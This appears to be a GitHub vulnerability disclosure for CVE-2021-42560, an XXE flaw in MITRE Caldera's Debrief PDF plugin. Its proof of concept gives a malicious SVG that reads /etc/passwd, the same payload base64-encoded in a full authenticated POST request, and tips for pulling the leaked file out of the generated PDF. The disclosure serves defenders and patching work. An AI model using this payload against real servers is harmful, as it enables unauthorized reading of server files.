Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Disclosures/CVE-2021-42560-Unsafe XML Parsing-MITRE Caldera/
Disclosures/CVE-2021-42560-Unsafe XML Parsing-MITRE Caldera/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 

CVE-2021-42560: Unsafe XML Parsing in MITRE Caldera

The Debrief plugin in Caldera (versions <=2.9.0) receives base64 encoded "SVG" parameters when generating a PDF. These SVG are parsed in an unsafe manner and can be leveraged for XXE attacks (E.g. File Exfiltration, Server Side Request Forgery, Out of Band Exfiltration, etc.).

Software:

The MITRE Caldera software can be found here.

Requirements:

This vulnerability requires:

  • Valid user credentials

Proof Of Concept:

In this example we will replace the “fact” SVG with a valid malicious payload that contains an inline XML External Entity (XXE) which will be used exfiltrate the "/etc/passwd" file.

The malicious SVG will have the following form:

<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><svg xmlns="http://www.w3.org/2000/svg" id="copy-svg" class="op-svg debrief-svg" style="width: 100%; height: 100%;" viewBox="2660 910 1199.699951171875 180"><defs><marker id="arrowheadtechnique" viewBox="-0 -5 10 10" refX="30" refY="0" orient="auto" markerWidth="8" markerHeight="8" xoverflow="visible"><path d="M 0,-5 L 10 ,0 L 0,5" fill="#999" style="stroke: none;"/></marker></defs><g class="container" width="100%" height="100%" transform="scale(5)"><g style="stroke: rgb(170, 170, 170);"/><g class="nodes"><g class="node operation" transform="translate(550,200)"><circle r="16" style="fill: rgb(239, 239, 239); stroke: rgb(66, 66, 66); stroke-width: 1px;"/><text class="label" x="18" y="8" style="font-size: 12px; fill: rgb(51, 51, 51);">&test;</text><g class="icons"><svg version="1.0" xmlns="http://www.w3.org/2000/svg" width="32" height="16" viewBox="0 0 270.000000 255.000000" preserveAspectRatio="xMidYMid meet" class="svg-icon" x="-16" y="-8">
<g transform="translate(0.000000,255.000000) scale(0.100000,-0.100000)" fill="#000000" stroke="none">
<path d="M593 2540 c-237 -43 -459 -238 -545 -480 -20 -58 -23 -83 -22 -220 0 -139 3 -164 28 -245 78 -257 252 -542 518 -850 132 -152 476 -487 637 -620 73 -60 137 -110 141 -110 17 0 279 226 430 371 326 312 534 563 701 843 269 451 272 812 9 1094 -187 202 -445 272 -675 186 -131 -49 -273 -176 -384 -345 -38 -58 -72 -111 -75 -117 -4 -9 -8 -9 -11 -1 -3 6 -37 60 -76 119 -118 181 -267 309 -416 355 -76 23 -190 32 -260 20z m452 -542 c23 -22 32 -57 125 -557 55 -294 102 -537 105 -539 6 -6 8 -2 165 415 74 194 142 362 153 373 26 29 74 23 99 -11 11 -14 54 -143 95 -285 41 -142 77 -261 80 -264 2 -2 52 46 111 108 l107 112 133 0 c72 0 132 -4 132 -8 0 -5 -18 -37 -40 -70 l-40 -62 -62 0 -63 0 -134 -150 c-73 -82 -142 -152 -153 -156 -29 -9 -66 4 -82 29 -8 12 -42 119 -76 237 -34 118 -65 219 -68 224 -2 4 -24 -43 -48 -105 -223 -592 -268 -707 -286 -726 -27 -29 -60 -29 -92 -1 -23 21 -32 60 -121 538 -53 283 -98 522 -102 530 -3 8 -35 -73 -72 -182 -36 -108 -74 -205 -84 -216 -27 -29 -70 -34 -246 -26 l-158 7 -41 68 -41 69 194 0 194 0 101 310 c104 315 125 360 169 360 11 0 31 -10 46 -22z"/>
</g>
</svg>undefined</g></g></g></g></svg>

Now we base64 encode the above SVG and insert it into the PDF creation POST request.

Request:

POST /plugin/debrief/pdf HTTP/1.1
Host: 127.0.0.1:8888
Content-Type: application/json
Content-Length: 39124
Cookie: API_SESSION="gAAAAA***TRUNCATED***vO8lJ6w=="

{"operations":["228395"],"graphs":{"graph":"PHN2ZyB4bWxucz0iaHR0cDov***TRUNCATED***PjwvZz48L2c+PC9zdmc+",
"tactic":"PHN2ZyB4bWxucz0iaHR0cDovL3***TRUNCATED***PjwvZz48L2c+PC9nPjwvc3ZnPg==",
"technique":"PHN2ZyB4bWxucz0iaHR0cDo***TRUNCATED***PC9nPjwvZz48L2c+PC9nPjwvc3ZnPg==",
"fact":"PCFET0NUWVBFIHJvb3QgWzwhRU5USVRZIHRlc3QgU1lTVEVNICdmaWxlOi8vL2V0Yy9wYXNzd2QnPl0+PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGlkPSJjb3B5LXN2ZyIgY2xhc3M9Im9wLXN2ZyBkZWJyaWVmLXN2ZyIgc3R5bGU9IndpZHRoOiAxMDAlOyBoZWlnaHQ6IDEwMCU7IiB2aWV3Qm94PSIyNjYwIDkxMCAxMTk5LjY5OTk1MTE3MTg3NSAxODAiPjxkZWZzPjxtYXJrZXIgaWQ9ImFycm93aGVhZHRlY2huaXF1ZSIgdmlld0JveD0iLTAgLTUgMTAgMTAiIHJlZlg9IjMwIiByZWZZPSIwIiBvcmllbnQ9ImF1dG8iIG1hcmtlcldpZHRoPSI4IiBtYXJrZXJIZWlnaHQ9IjgiIHhvdmVyZmxvdz0idmlzaWJsZSI+PHBhdGggZD0iTSAwLC01IEwgMTAgLDAgTCAwLDUiIGZpbGw9IiM5OTkiIHN0eWxlPSJzdHJva2U6IG5vbmU7Ii8+PC9tYXJrZXI+PC9kZWZzPjxnIGNsYXNzPSJjb250YWluZXIiIHdpZHRoPSIxMDAlIiBoZWlnaHQ9IjEwMCUiIHRyYW5zZm9ybT0ic2NhbGUoNSkiPjxnIHN0eWxlPSJzdHJva2U6IHJnYigxNzAsIDE3MCwgMTcwKTsiLz48ZyBjbGFzcz0ibm9kZXMiPjxnIGNsYXNzPSJub2RlIG9wZXJhdGlvbiIgdHJhbnNmb3JtPSJ0cmFuc2xhdGUoNTUwLDIwMCkiPjxjaXJjbGUgcj0iMTYiIHN0eWxlPSJmaWxsOiByZ2IoMjM5LCAyMzksIDIzOSk7IHN0cm9rZTogcmdiKDY2LCA2NiwgNjYpOyBzdHJva2Utd2lkdGg6IDFweDsiLz48dGV4dCBjbGFzcz0ibGFiZWwiIHg9IjE4IiB5PSI4IiBzdHlsZT0iZm9udC1zaXplOiAxMnB4OyBmaWxsOiByZ2IoNTEsIDUxLCA1MSk7Ij4mdGVzdDs8L3RleHQ+PGcgY2xhc3M9Imljb25zIj48c3ZnIHZlcnNpb249IjEuMCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB3aWR0aD0iMzIiIGhlaWdodD0iMTYiIHZpZXdCb3g9IjAgMCAyNzAuMDAwMDAwIDI1NS4wMDAwMDAiIHByZXNlcnZlQXNwZWN0UmF0aW89InhNaWRZTWlkIG1lZXQiIGNsYXNzPSJzdmctaWNvbiIgeD0iLTE2IiB5PSItOCI+CjxnIHRyYW5zZm9ybT0idHJhbnNsYXRlKDAuMDAwMDAwLDI1NS4wMDAwMDApIHNjYWxlKDAuMTAwMDAwLC0wLjEwMDAwMCkiIGZpbGw9IiMwMDAwMDAiIHN0cm9rZT0ibm9uZSI+CjxwYXRoIGQ9Ik01OTMgMjU0MCBjLTIzNyAtNDMgLTQ1OSAtMjM4IC01NDUgLTQ4MCAtMjAgLTU4IC0yMyAtODMgLTIyIC0yMjAgMCAtMTM5IDMgLTE2NCAyOCAtMjQ1IDc4IC0yNTcgMjUyIC01NDIgNTE4IC04NTAgMTMyIC0xNTIgNDc2IC00ODcgNjM3IC02MjAgNzMgLTYwIDEzNyAtMTEwIDE0MSAtMTEwIDE3IDAgMjc5IDIyNiA0MzAgMzcxIDMyNiAzMTIgNTM0IDU2MyA3MDEgODQzIDI2OSA0NTEgMjcyIDgxMiA5IDEwOTQgLTE4NyAyMDIgLTQ0NSAyNzIgLTY3NSAxODYgLTEzMSAtNDkgLTI3MyAtMTc2IC0zODQgLTM0NSAtMzggLTU4IC03MiAtMTExIC03NSAtMTE3IC00IC05IC04IC05IC0xMSAtMSAtMyA2IC0zNyA2MCAtNzYgMTE5IC0xMTggMTgxIC0yNjcgMzA5IC00MTYgMzU1IC03NiAyMyAtMTkwIDMyIC0yNjAgMjB6IG00NTIgLTU0MiBjMjMgLTIyIDMyIC01NyAxMjUgLTU1NyA1NSAtMjk0IDEwMiAtNTM3IDEwNSAtNTM5IDYgLTYgOCAtMiAxNjUgNDE1IDc0IDE5NCAxNDIgMzYyIDE1MyAzNzMgMjYgMjkgNzQgMjMgOTkgLTExIDExIC0xNCA1NCAtMTQzIDk1IC0yODUgNDEgLTE0MiA3NyAtMjYxIDgwIC0yNjQgMiAtMiA1MiA0NiAxMTEgMTA4IGwxMDcgMTEyIDEzMyAwIGM3MiAwIDEzMiAtNCAxMzIgLTggMCAtNSAtMTggLTM3IC00MCAtNzAgbC00MCAtNjIgLTYyIDAgLTYzIDAgLTEzNCAtMTUwIGMtNzMgLTgyIC0xNDIgLTE1MiAtMTUzIC0xNTYgLTI5IC05IC02NiA0IC04MiAyOSAtOCAxMiAtNDIgMTE5IC03NiAyMzcgLTM0IDExOCAtNjUgMjE5IC02OCAyMjQgLTIgNCAtMjQgLTQzIC00OCAtMTA1IC0yMjMgLTU5MiAtMjY4IC03MDcgLTI4NiAtNzI2IC0yNyAtMjkgLTYwIC0yOSAtOTIgLTEgLTIzIDIxIC0zMiA2MCAtMTIxIDUzOCAtNTMgMjgzIC05OCA1MjIgLTEwMiA1MzAgLTMgOCAtMzUgLTczIC03MiAtMTgyIC0zNiAtMTA4IC03NCAtMjA1IC04NCAtMjE2IC0yNyAtMjkgLTcwIC0zNCAtMjQ2IC0yNiBsLTE1OCA3IC00MSA2OCAtNDEgNjkgMTk0IDAgMTk0IDAgMTAxIDMxMCBjMTA0IDMxNSAxMjUgMzYwIDE2OSAzNjAgMTEgMCAzMSAtMTAgNDYgLTIyeiIvPgo8L2c+Cjwvc3ZnPnVuZGVmaW5lZDwvZz48L2c+PC9nPjwvZz48L3N2Zz4="}}

The resulting PDF will contain the exfiltrated content of the "/etc/passwd" file:

Note: Modifications can be made to the SVG text proportions/wrap properties to display the whole file contents. Another option may be to use tools that extract text from PDF in order to recover all the exfiltrated information.